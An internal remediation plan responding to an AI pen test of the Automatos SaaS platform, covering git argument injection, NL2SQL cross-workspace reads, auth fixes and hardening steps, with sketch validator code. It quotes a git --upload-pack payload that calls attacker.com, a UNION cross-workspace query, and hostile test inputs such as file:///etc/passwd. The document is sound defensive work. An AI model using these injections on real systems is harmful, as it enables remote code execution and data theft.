PRD-70: Security Hardening — Pen Test Remediation
Version: 1.0
Status: Draft, CRITICAL PRIORITY
Priority: P0
Author: Gar Kavanagh + Auto CTO
Created: 2026-03-03
Updated: 2026-03-03
Dependencies: PRD-44 (Security Hardening Architecture, 12 of 45 stories complete), PRD-18 (Credential Management, COMPLETE), PRD-61 (NL2SQL V2, COMPLETE)
Source: Shannon AI Penetration Test Report (2026-03-03), 4.4 hours, $90.83, 12 phases completed
Branch: fix/pentest-remediation-70
Executive Summary
On 2026-03-03, the Shannon AI penetration testing framework completed a full-scope assessment of https://ui.automatos.app covering authentication, authorization, XSS, SQL/command injection, and SSRF. Shannon was unable to breach the external perimeter — zero vulnerabilities were exploited from an unauthenticated position. Clerk auth, the waitlist system, and Next.js framework protections held.
However, Shannon identified 8 injection vulnerabilities and 21 authorization concerns through code analysis that become exploitable once an attacker has a valid account. Since Automatos is a SaaS platform where every paid user gets an authenticated session, "requires authentication" is not a mitigating factor — it's the baseline.
Independent Verification Results
I independently verified every Shannon finding against the actual codebase. Shannon's analysis was partially based on PRD documentation rather than live code (they acknowledged this limitation). Here's what changed after verification:
| Shannon finding | Shannon severity | Verified severity | Verification notes |
|---|---|---|---|
| 7 command injection (git clone) | CRITICAL | CRITICAL (confirmed) | 3 distinct code paths, all missing -- separator, branch params unvalidated |
| 1 SQL injection (NL2SQL) | CRITICAL | MEDIUM (downgraded) | PRD-61 fix catches mutations in subqueries. Real risk is UNION cross-workspace reads |
| Auto-admin @automatos.app | CRITICAL | LOW (downgraded) | Backend removed this (clerk.py:196). Frontend-only, doesn't grant backend access |
| Frontend-only admin auth | CRITICAL | FALSE POSITIVE | Backend has _assert_admin() on every admin endpoint |
| 21 IDOR / authz issues | HIGH (21 items) | LOW (downgraded) | Backend consistently filters by workspace_id on all CRUD operations |
| 4 SSRF via git clone | HIGH | CRITICAL (same as command injection) | Same root cause as command injection findings |
| JWT audience validation | MEDIUM | MEDIUM (confirmed) | Configuration check needed |
| Generated images proxy SSRF | MEDIUM | FALSE POSITIVE (confirmed) | Next.js framework protection blocks exploitation |
Bottom line: Shannon overcounted by basing findings on PRD docs instead of actual code. The real attack surface is smaller but the git clone vulnerabilities are genuinely critical. This PRD fixes everything that actually matters.
What's Actually Critical
Git argument injection: 3 live code paths allow RCE via --upload-pack flag injection. Authenticated users can execute arbitrary commands on the backend server.
Missing -- separator: No git subprocess call uses -- to delimit options from positional arguments. URLs starting with -- are interpreted as flags.
NL2SQL cross-workspace reads: The validator prevents mutations but doesn't enforce workspace isolation in SELECT queries. UNION-based cross-workspace data exfiltration is possible.
Database SSL not enforced: Connection strings lack sslmode=require.
Frontend auto-admin remnant: role-context.tsx:44-48 still grants admin UI to @automatos.app emails even though the backend ignores it.
1. Findings Detail
1.1 CRITICAL: Git Argument Injection (3 Code Paths + 1 Script)
All paths share the same root cause: user-controlled branch parameters are passed to git subprocess calls without validation, and no -- separator is used.
Path A: Skills Import (skill_loader.py) — HIGHEST RISK
Critical discovery: The skills import endpoint at api/skills.py:183 has NO admin check. ANY authenticated user can import git repos. Skills auto-activate immediately with no approval workflow (unlike plugins, which require admin approval + security scan).
What's validated: validate_git_url() at line 96 checks the URL hostname against an allowlist (github.com, gitlab.com, bitbucket.org). This blocks arbitrary URLs but does NOT prevent branch parameter injection.
What's NOT validated:
branch parameter: no validation at all. --upload-pack='bash -c "curl attacker.com"' as branch value gives RCE.
No -- separator before positional git_url argument
Contrast with Plugins: The plugin import path (POST /api/admin/plugins/import-github) correctly requires _assert_admin() at line 507 of admin_plugins.py, runs a full security scan (static + LLM), and requires admin approval. Skills bypass all of this.
Decision: Lock skills import to admin-only for now. Future: build a safe user-facing import flow with full security scan + marketplace approval, matching the plugin pipeline.
Path B: CodeGraph Indexing (codegraph_service.py) — KEEP BUT SECURE
What's validated: Nothing. The IndexGitHubRequest Pydantic model accepts any string as github_url: no URL parsing, no domain check, no protocol check.
What works well:
Workspace scoping is enforced at DB level: all codegraph tables filter by workspace_id
Clones into tempfile.mkdtemp(), cleaned up on success and failure
Duplicate prevention: won't re-index if status is already "indexing"
What needs fixing:
Add URL validation (HTTPS only, github.com/gitlab.com/bitbucket.org only, since this is a code indexing tool)
Add branch validation (no leading -)
GitPython's Repo.clone_from() passes branch to git CLI, so the same injection risk applies
Auth token injected into URL at line 452: if an exception leaks the URL, the token is exposed
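The token-leak item above can be contained by redacting credentials before a URL ever reaches a log line or an error response. The following is a minimal sketch under stated assumptions: the helper names redact_url_credentials and safe_error_message are hypothetical and do not exist in codegraph_service.py today.

```python
from urllib.parse import urlsplit, urlunsplit


def redact_url_credentials(url: str) -> str:
    """Return the URL with any userinfo (user:token@) replaced by a placeholder."""
    parts = urlsplit(url)
    if parts.username is None and parts.password is None:
        return url  # nothing to hide
    host = parts.hostname or ""
    if parts.port is not None:
        host = f"{host}:{parts.port}"
    return urlunsplit((parts.scheme, f"***@{host}", parts.path, parts.query, parts.fragment))


def safe_error_message(exc: Exception, authed_url: str) -> str:
    """Replace any occurrence of the tokenized URL in an exception message."""
    return str(exc).replace(authed_url, redact_url_credentials(authed_url))
```

Wrapping the clone call in a try/except that logs safe_error_message(exc, authed_url) instead of the raw exception would keep the token out of logs even when the underlying library echoes the full command line.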
Path C: Workspace GitHub Clone (workspace_github.py) — BEST ISOLATED
Already well-secured:
CloneRequest Pydantic model has @field_validator("repo_url"): validates HTTPS only, allowed hosts (github.com, gitlab.com, bitbucket.org), strips embedded credentials
Runs in separate workspace-worker container (not the backend server)
Per-workspace filesystem isolation (/workspaces/{workspace_id}/)
Backend has read-only mount; worker has read-write
Command whitelist blocks sudo, su, mount, etc.
Path traversal prevention via resolve_safe_path()
5GB quota per workspace
Workspace access verified at line 180
What still needs fixing:
branch parameter has no validation (same leading-dash injection risk)
Worker's git clone command doesn't use -- separator
These are lower severity because the worker container has limited blast radius vs. the backend server
Path D: Plugin Harvest Script (harvest_plugins.py)
Lower risk: Standalone script, not an API endpoint. URLs come from hardcoded CURATED_REPOS list. Plugins go through PluginUploadService with full security scan. Fix for completeness.
1.2 MEDIUM: NL2SQL Validator Gaps
Shannon's claim: "Regex validator fails to detect nested subqueries with mutations."
Actual state: The validator at modules/nl2sql/query/validator.py:203-210 was fixed in PRD-61 (US-009). It strips string literals, then checks DENY_KEYWORDS (\bINSERT\b, \bUPDATE\b, \bDELETE\b, etc.) across the ENTIRE SQL including subqueries. Nested INSERT INTO ... RETURNING * WOULD be caught because \bINSERT\b matches the keyword even inside a subquery.
What IS still vulnerable:
UNION cross-workspace reads: SELECT * FROM users WHERE workspace_id = 'mine' UNION SELECT * FROM users WHERE workspace_id = 'theirs'. No mutations, passes all keyword checks. The table allowlist helps (lines 214-223 validate tables against schema metadata), but if the NL2SQL data source includes shared tables like users or workspace_members, cross-workspace reads are possible.
RETURNING not in deny list: While INSERT is denied, if an LLM generates SQL using only RETURNING in a creative way, there's no catch.
Regex fundamentally can't parse SQL: Edge cases will always exist. AST-based parsing is the correct approach.
Real severity: MEDIUM (not CRITICAL). The mutation protection works. The residual risk is cross-workspace SELECTs.
1.3 LOW: Frontend Auto-Admin Remnant
Backend status: Removed. orchestrator/core/auth/clerk.py:196 has the comment: "Domain-based auto-admin was removed for security (see PRD-43 US-025)."
Impact: Frontend shows admin UI to @automatos.app users, but all admin API calls go through _assert_admin() which checks system_role from the Clerk JWT, not email domain. An attacker registering with @automatos.app email gets admin UI but every admin API call returns 403.
Still should be fixed: The frontend check should be removed to prevent confusion and to align with the principle that security decisions should never happen in the frontend.
1.4 FALSE POSITIVES (Shannon Overcounts)
21 IDOR / authorization issues: Backend verification confirms comprehensive workspace filtering:
agents.py:611 checks Agent.workspace_id == ctx.workspace_id
documents.py:501 checks Document.workspace_id == ctx.workspace_id
workflows.py:387 checks Workflow.workspace_id == ctx.workspace_id
channels.py uses a parameterized workspace_id in raw SQL
Admin endpoints call _assert_admin() on every handler
Chat endpoints perform user_id ownership checks
Shannon could not test these from an unauthenticated position and classified them based on PRD documentation rather than actual code review. The backend implementation is sound.
Frontend-only admin auth: Backend admin_plugins.py and admin_prompts.py both implement _assert_admin() — a function that checks ctx.user.system_role in ("admin", "super_admin") on every request. This is not frontend-only.
1.5 MEDIUM: Infrastructure Gaps (From Data Security Audit)
| Gap | Current state | Risk |
|---|---|---|
| Database SSL | No sslmode in DATABASE_URL | Data in transit unencrypted between backend and Postgres |
| Redis TLS | No TLS configured | Cached data (sessions, rate limits) unencrypted |
| Redis dangerous commands | FLUSHDB, FLUSHALL, CONFIG available | If Redis exposed, full data wipe possible |
| Audit service | Stub file (199 bytes, no implementation) | No audit trail for security-sensitive operations |
| JWT audience validation | Optional, may not be configured | Cross-Clerk-app JWT reuse if CLERK_AUDIENCE unset |
2. Remediation Plan
Phase 1: Critical Fixes (Week 1) — Stop the Bleeding
These fixes prevent RCE on the backend server. Ship immediately.
FIX-01: Secure Git Operations (ALL code paths)
Create: orchestrator/core/security/git_sanitizer.py
Modify files:
| File | Change | Priority |
|---|---|---|
| api/skills.py | Add _assert_admin(ctx) check to import_git_repository() at line 183. Skills import is admin-only until a safe user-facing flow is built. | P0 |
| modules/agents/services/skill_loader.py | Replace inline validate_git_url with import from git_sanitizer. Add validate_branch() call before _git_clone(). Use build_git_clone_cmd() in _git_clone(). | P0 |
| modules/codegraph/codegraph_service.py | Add validate_git_url() + validate_branch() before Repo.clone_from(). Validate URL is HTTPS + allowed domain (this is a code indexing tool, so only git hosts make sense). | P0 |
| api/workspace_github.py | Add validate_branch() before building task step. URL already validated by Pydantic model. | P1 |
| services/workspace-worker/executor.py | Add -- separator to git clone command in _git_clone() handler (line ~380). Add validate_branch(). | P1 |
| scripts/harvest_plugins.py | Add validate_git_url() before clone_repo(). Use build_git_clone_cmd(). | P2 |
Key principles:
Every git URL is validated: HTTPS only, domain allowlist, no leading -
Every branch name is validated: alphanumeric + ./_-, no leading -
Every subprocess.run git call uses -- separator before positional args
One module, one import: no per-file reimplementation
Skills import locked to admin-only (matches plugin import pattern)
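The principles above could be realized roughly as follows. This is a sketch, not the final git_sanitizer.py: the function names validate_git_url, validate_branch and build_git_clone_cmd come from this PRD, but their signatures, the ALLOWED_HOSTS constant and the exact branch pattern are assumptions made for illustration.

```python
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Assumed allowlist, taken from the hosts named in this PRD.
ALLOWED_HOSTS = {"github.com", "gitlab.com", "bitbucket.org"}
# Alphanumerics plus . / _ and -, where the first character may not be "-".
_BRANCH_RE = re.compile(r"[A-Za-z0-9._/][A-Za-z0-9._/-]*")


def validate_git_url(url: str) -> str:
    """Accept only https URLs on allowlisted hosts; reject option-like input."""
    if url.startswith("-"):
        raise ValueError("git URL must not start with '-'")
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError("git URL must use https")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("git host is not on the allowlist")
    return url


def validate_branch(branch: str) -> str:
    """Reject branch names with a leading '-' or characters outside the safe set."""
    if not _BRANCH_RE.fullmatch(branch):
        raise ValueError("invalid branch name")
    return branch


def build_git_clone_cmd(url: str, dest: str, branch: Optional[str] = None) -> List[str]:
    """Build an argv list (never a shell string) with '--' before positionals."""
    cmd = ["git", "clone"]
    if branch is not None:
        cmd.append(f"--branch={validate_branch(branch)}")
    cmd += ["--", validate_git_url(url), dest]
    return cmd
```

The returned list is meant to be passed to subprocess.run without shell=True. Attaching the branch as --branch=<name> and placing -- before the URL means neither value can be parsed by git as a separate option, even if a validation rule is later loosened.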
FIX-02: Remove Frontend Auto-Admin
Modify: frontend/contexts/role-context.tsx
Delete lines 44-49 (the @automatos.app domain check). Admin role should come exclusively from Clerk publicMetadata.role.
FIX-03: Enforce JWT Audience Validation
Modify: orchestrator/core/auth/clerk.py
Ensure CLERK_AUDIENCE is set and validated. Add a startup check:
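A minimal sketch of such a fail-fast check, assuming the setting is read from the process environment. The ConfigError class and the require_clerk_audience helper are hypothetical names, not existing code in clerk.py.

```python
import os
from typing import Mapping


class ConfigError(RuntimeError):
    """Raised when a required security setting is missing."""


def require_clerk_audience(env: Mapping[str, str] = os.environ) -> str:
    """Return the configured audience, or refuse to start if it is unset or blank."""
    audience = env.get("CLERK_AUDIENCE", "").strip()
    if not audience:
        raise ConfigError("CLERK_AUDIENCE must be set; refusing to start")
    return audience
```

Calling this once during application startup turns a silent misconfiguration into a deploy-time failure. The returned value would then be supplied to whatever JWT verification call the backend uses so that the aud claim is always checked.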
Add to deployment checklist: CLERK_AUDIENCE must be set in all environments.
Phase 2: Defense in Depth (Week 2) — Harden the Perimeter
FIX-04: NL2SQL Query Hardening
Modify: orchestrator/modules/nl2sql/query/validator.py
Add RETURNING to deny list.
Enforce workspace isolation at SQL level.
Add CTE detection.
Future: Replace regex with AST parsing (Phase 3). Use sqlglot or pglast to parse SQL into an AST and validate the tree structure rather than string patterns.
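As an interim illustration of the regex-level checks listed above, the sketch below flags the extra deny keywords, set operations and leading CTEs after stripping string literals. It is an assumption-laden example: hardening_violations is a hypothetical helper, and rejecting UNION/INTERSECT/EXCEPT outright is one conservative way to block cross-workspace reads, not necessarily the workspace-filter approach the validator will adopt.

```python
import re
from typing import List

# Keywords this PRD proposes adding to the deny list.
_EXTRA_DENY = re.compile(r"\b(RETURNING|COPY|EXECUTE)\b", re.IGNORECASE)
# Single-quoted SQL string literals, including doubled-quote escapes.
_STRING_LITERAL = re.compile(r"'(?:[^']|'')*'")
_SET_OPS = re.compile(r"\b(UNION|INTERSECT|EXCEPT)\b", re.IGNORECASE)
_CTE = re.compile(r"^\s*WITH\b", re.IGNORECASE)


def hardening_violations(sql: str) -> List[str]:
    """Return a list of human-readable violations; empty means the checks passed."""
    stripped = _STRING_LITERAL.sub("''", sql)  # ignore keywords inside literals
    problems = []
    match = _EXTRA_DENY.search(stripped)
    if match:
        problems.append(f"denied keyword: {match.group(1).upper()}")
    if _SET_OPS.search(stripped):
        problems.append("set operation not allowed")
    if _CTE.search(stripped):
        problems.append("CTE not allowed")
    return problems
```

Like any regex check, this remains a stopgap with edge cases (comments, dollar-quoted strings), which is the motivation for the AST-based replacement planned for Phase 3.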
FIX-05: Database Connection Security
Modify: orchestrator/config.py and docker-compose.yml
Add sslmode=require to DATABASE_URL.
Disable Redis dangerous commands in docker-compose.yml.
Note: CONFIG rename breaks Redis introspection tools. Only apply in production. Use an environment-conditional redis.conf if needed.
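One way to guarantee the sslmode setting regardless of how DATABASE_URL was supplied is to normalize it in config.py. The sketch below assumes a libpq-style driver that reads sslmode from the URL query string; with_sslmode_require is a hypothetical helper name.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# libpq sslmode values that already encrypt the connection.
_STRONG_MODES = {"require", "verify-ca", "verify-full"}


def with_sslmode_require(database_url: str) -> str:
    """Ensure the URL carries sslmode=require (or a stricter mode already set)."""
    parts = urlsplit(database_url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    current = dict(params).get("sslmode")
    if current in _STRONG_MODES:
        return database_url  # never downgrade verify-ca / verify-full
    params = [(k, v) for k, v in params if k != "sslmode"]
    params.append(("sslmode", "require"))
    return urlunsplit(parts._replace(query=urlencode(params)))
```

Leaving stricter modes untouched matters because verify-full also authenticates the server certificate, which require alone does not.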
FIX-06: Audit Service Implementation
Modify: orchestrator/core/services/audit_service.py
The audit service is currently a 199-byte stub. Implement actual audit logging for security-sensitive operations:
Write to the audit_logs table (already defined in schema). Include: timestamp, user_id, workspace_id, event_type, resource_id, ip_address, user_agent, result (success/failure), and metadata JSON.
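The record shape described above might be modeled as below. This is a sketch only: the AuditEvent class, its to_row method and the example event type are hypothetical, and the actual column types of audit_logs are not specified in this PRD.

```python
import json
from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone
from typing import Any, Dict, Optional


@dataclass(frozen=True)
class AuditEvent:
    user_id: str
    workspace_id: str
    event_type: str
    result: str  # "success" or "failure"
    resource_id: Optional[str] = None
    ip_address: Optional[str] = None
    user_agent: Optional[str] = None
    metadata: Dict[str, Any] = field(default_factory=dict)
    # UTC timestamp captured when the event object is created.
    timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())

    def __post_init__(self) -> None:
        if self.result not in ("success", "failure"):
            raise ValueError("result must be 'success' or 'failure'")

    def to_row(self) -> Dict[str, Any]:
        """Flatten to a dict suitable for an INSERT, with metadata as a JSON string."""
        row = asdict(self)
        row["metadata"] = json.dumps(row["metadata"], sort_keys=True)
        return row
```

Recording failures as well as successes is the point of the result field: a rejected skills import with an invalid branch is exactly the kind of event an investigator would want to find later.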
Phase 3: Proactive Security (Weeks 3-4)
FIX-07: Rate Limiting per Workspace
Modify: Rate limiting configuration
Current: 60 req/min per IP (global). Add per-workspace rate limiting for sensitive operations:
| Operation | Limit |
|---|---|
| Git clone (any path) | 5/hour per workspace |
| NL2SQL query | 30/min per workspace |
| Admin operations | 20/min per user |
| Plugin/skill import | 3/hour per workspace |
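The limits above can be expressed with a sliding-window counter keyed by operation and workspace (or user). The sketch below is an in-process illustration with a hypothetical SlidingWindowLimiter class; a multi-instance deployment would presumably need a shared store such as Redis instead, which is an assumption and not something this PRD specifies.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict, Tuple


class SlidingWindowLimiter:
    """Allow at most `limit` calls per `window_seconds` for each (operation, key)."""

    def __init__(self, limit: int, window_seconds: float,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.limit = limit
        self.window = window_seconds
        self.clock = clock
        self._hits: Dict[Tuple[str, str], Deque[float]] = defaultdict(deque)

    def allow(self, operation: str, key: str) -> bool:
        now = self.clock()
        hits = self._hits[(operation, key)]
        # Drop timestamps that have aged out of the window.
        while hits and now - hits[0] >= self.window:
            hits.popleft()
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True
```

For example, SlidingWindowLimiter(5, 3600) with allow("git_clone", workspace_id) would model the 5/hour git clone limit, where "git_clone" is an illustrative operation label.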
FIX-08: CSP and Security Headers
Modify: frontend/middleware.ts or Next.js config
Verify and enforce:
Content-Security-Policy (restrict script sources, prevent inline scripts)
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy (disable unused browser features)
FIX-09: Dependency Audit
Run pip-audit and npm audit / yarn audit to identify known CVEs in dependencies. Fix or pin affected packages.
FIX-10: Scheduled Shannon Re-Test
After all fixes are deployed, re-run Shannon with authenticated test credentials to:
Verify all injection paths are blocked
Test IDOR/authz with actual authenticated sessions
Validate workspace isolation under adversarial conditions
3. File Impact Table
New Files
| File | Fix | Purpose |
|---|---|---|
| orchestrator/core/security/__init__.py | FIX-01 | Security utilities package |
| orchestrator/core/security/git_sanitizer.py | FIX-01 | Centralized git URL/branch validation |
| orchestrator/tests/security/test_git_sanitizer.py | FIX-01 | Unit tests for git sanitizer |
| orchestrator/tests/security/test_nl2sql_validator.py | FIX-04 | Adversarial SQL injection test cases |
Modified Files
| File | Fix | Change |
|---|---|---|
| orchestrator/api/skills.py | FIX-01 | Add _assert_admin() to skills git import endpoint; admin-only until safe user flow exists |
| orchestrator/modules/agents/services/skill_loader.py | FIX-01 | Replace inline validation with git_sanitizer imports; add -- separator; add branch validation |
| orchestrator/modules/codegraph/codegraph_service.py | FIX-01 | Add URL/branch validation before Repo.clone_from(); HTTPS + domain allowlist |
| orchestrator/api/workspace_github.py | FIX-01 | Add branch validation before task submission (URL already validated by Pydantic) |
| services/workspace-worker/executor.py | FIX-01 | Add -- separator + branch validation in _git_clone() handler |
| orchestrator/scripts/harvest_plugins.py | FIX-01 | Add URL validation; use build_git_clone_cmd() |
| frontend/contexts/role-context.tsx | FIX-02 | Remove @automatos.app auto-admin logic |
| orchestrator/core/auth/clerk.py | FIX-03 | Enforce CLERK_AUDIENCE validation |
| orchestrator/config.py | FIX-03, FIX-05 | Add CLERK_AUDIENCE config; add sslmode to DATABASE_URL |
| orchestrator/modules/nl2sql/query/validator.py | FIX-04 | Add RETURNING/COPY/EXECUTE to deny list; add CTE detection; add workspace filter injection |
| docker-compose.yml | FIX-05 | Disable Redis dangerous commands |
| orchestrator/core/services/audit_service.py | FIX-06 | Implement actual audit logging (replace stub) |
4. Test Plan
Unit Tests (FIX-01: Git Sanitizer)
Unit Tests (FIX-04: NL2SQL Hardening)
Integration Tests
| Test | Expected result |
|---|---|
| Submit skills import with --upload-pack as branch | Returns 400, not 500 or RCE |
| Submit codegraph index with file:///etc/passwd as URL | Returns 400 |
| Submit workspace clone with internal IP as URL | Returns 400 |
| Admin endpoint without admin role | Returns 403 (backend enforced) |
| NL2SQL with UNION cross-workspace query | Returns validation error |
Regression Test (Post-Deploy)
Re-run Shannon with authenticated test credentials. Provide:
2 test accounts in different workspaces (for IDOR testing)
1 admin account (for vertical escalation testing)
1 regular user account (for privilege escalation testing)
5. Deployment Checklist
Pre-Deploy (Environment Config)
Deploy Order
FIX-01 (git sanitizer) — Ship first, blocks RCE
FIX-02 (frontend auto-admin removal) — Quick frontend deploy
FIX-03 (JWT audience) — Config change + code
FIX-04 (NL2SQL hardening) — Backend deploy
FIX-05 (DB/Redis security) — Infrastructure change, schedule maintenance window
FIX-06 (audit service) — Backend deploy
FIX-07 through FIX-09 — Iterative hardening
Post-Deploy Verification
6. Architecture Context: Why Each Path Has Different Risk
Understanding the isolation model changes the severity assessment:
Path C (workspace clone) is the only one with meaningful isolation. Paths A and B execute git on the backend server where environment variables contain database credentials, API keys, and secrets. An --upload-pack injection on Path A or B gives RCE with full access to POSTGRES_PASSWORD, OPENROUTER_API_KEY, CLERK_SECRET_KEY, etc.
Skills vs. Plugins: The Access Control Gap
| Aspect | Skills | Plugins |
|---|---|---|
| Import endpoint | POST /api/v1/skills/sources/git | POST /api/admin/plugins/import-github |
| Auth requirement | Any authenticated user | Admin only (_assert_admin()) |
| Security scan | Basic pattern matching (8 patterns) | Full static + LLM-based scan |
| Approval workflow | None, auto-activated | Admin approval required |
| Activation scope | Global (all workspaces) | Per-workspace enablement |
| Assignment | Direct to any agent | Via AgentAssignedPlugin |
The fix: Lock POST /api/v1/skills/sources/git to admin-only immediately. This matches the plugin import pattern and removes the chain from any authenticated non-admin user to RCE. Future: build a safe user-facing skill import with the same security scan + approval workflow that plugins use.
7. Shannon Assessment Quality Notes
Shannon ran a thorough 4.4-hour assessment across 12 phases. Key observations:
Strengths:
Excellent external perimeter testing — confirmed Clerk auth is robust (rate limiting at 5 attempts, Cloudflare Turnstile CAPTCHA active, bot detection working)
Thorough injection analysis — identified every git clone code path
Good methodology — proof-by-exploitation focus, no assumptions
Honest about limitations (documented that backend code analysis was based on PRDs, not actual code)
Limitations:
Based several backend findings on PRD documentation, not actual Python source (acknowledged in report)
Overcounted authorization issues (21) that were actually properly implemented in the backend
Classified NL2SQL validator as fully bypassable — missed the PRD-61 fix that catches mutations in subqueries
Auto-admin finding was based on frontend code only — didn't verify backend enforcement
Recommendation: Next Shannon run should:
Be given read access to the actual orchestrator/ Python source
Be provided authenticated test credentials (bypass waitlist)
Run an internal-scope test focused on the 21 authz items that couldn't be tested externally

